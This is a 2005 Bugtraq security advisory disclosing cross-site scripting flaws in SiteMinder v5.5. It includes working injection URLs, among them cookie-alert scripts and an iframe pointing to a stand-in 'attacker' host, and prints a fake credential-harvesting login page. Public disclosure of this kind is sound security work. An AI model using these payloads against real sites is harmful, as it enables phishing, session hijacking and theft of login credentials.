[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    SiteMinder Multiple Vulnerabilities
From:       c0ntexb () gmail ! com
Date:       2005-07-08 14:03:11
Message-ID: 20050708140311.20979.qmail () securityfocus ! com
[Download RAW message or body]

 /*
  *****************************************************************************************************************
  $ An open security advisory #10 - Siteminder v5.5 Vulnerabilities
  *****************************************************************************************************************
  1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
  2: Bug Released: July 08 2005
  3: Bug Impact Rate: Medium / Hi
  4: Bug Scope Rate: Remote
  *****************************************************************************************************************
  $ This advisory and/or proof of concept code must not be used for commercial gain.
  *****************************************************************************************************************


  Siteminder
  http://www3.ca.com/Solutions/Product.asp?ID=5262

  "eTrust™ SiteMinder® is a market-leading, security and management foundation for \
enterprise Web  applications with a centralized security infrastructure for managing \
user authentication and  access. eTrust SiteMinder delivers the market’s most \
advanced security management capabilities  and enterprise-class site administration, \
reducing overall IT operational cost and complexity.  eTrust SiteMinder enables the \
secure delivery of essential information and applications to  employees, partners, \
suppliers and customers, and scales with growing business needs.."

  Siteminder is vulnerable to XSS whereby a user can tag HTML or javascript on to \
various locations  in a URL or input field and have the script run in the local users \
browser. This can be used to  perform phishing attacks, hijack users browser sessions \
or user account information by redrawing  the login page of a site.

  http://vuln/siteminderagent/pwcgi/smpwservicescgi.exe?SMAUTHREASON=0&TARGET=&USERNAME=hacker&
  PASSWORD="><script>alert(document.cookie)</script>&BUFFER="><script>alert("Vulnerable")</script>


  The following link will abuse the URL option by first logging the user out of the \
site with a  timeout error, due to the fact that we send her off to another HTTPS \
site, taking the user back to  the login page. Next, we open an IFRAME over the \
original login fields with malicious Username and  Password input fields, whereby a \
user will then supply their login details to a malicious site,  to be later harvested \
and used in an attack.

  http://site.com/siteminderagent/forms/login.fcc?TYPE=1&REALMOID=01-000000000-000000-0010-
  0000-0000000000000&GUID=&SMAUTHREASON=32&TARGET=http://site.com/servlet/yum/eat/user.html">
  <iframe bgcolor="white" src="https://attacker/snoop.html" style="position: \
absolute; top:  270px; left: 15 px;"></iframe><iframe \
src="https://attacker/snoop.html" style="position:  absolute; top: 270px; left: 15 \
px;"></iframe>

  To test if you are vulnerable to this issue, you can tag the following on to the \
end of a  siteminder URL. If it is successful, you should see the Google homepage \
within an IFRAME.

  "><iframe bgcolor="white" src="http://www.google.com" style="position: absolute; \
top: 270px;  left: 15 px;"></iframe><iframe src="http://www.google.com" \
style="position: absolute; top:  270px; left: 15 px;"></iframe>


  /* snoop.html */
  <html>
    </head></head>
  <body>
    <form>
     User ID
      <input type="text" name="UserID">
     <br>
     Password:
      <input type="text" name="Password">
      <input type="submit" value="Submit">
    </form>
  </body>
  </html>


  I have contacted Netegrity via ca.com multiple times but received no response, as \
such, users  should use a filtering technology like modsecurity to detect the above \
descibed attacks until  a fix has been released.


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic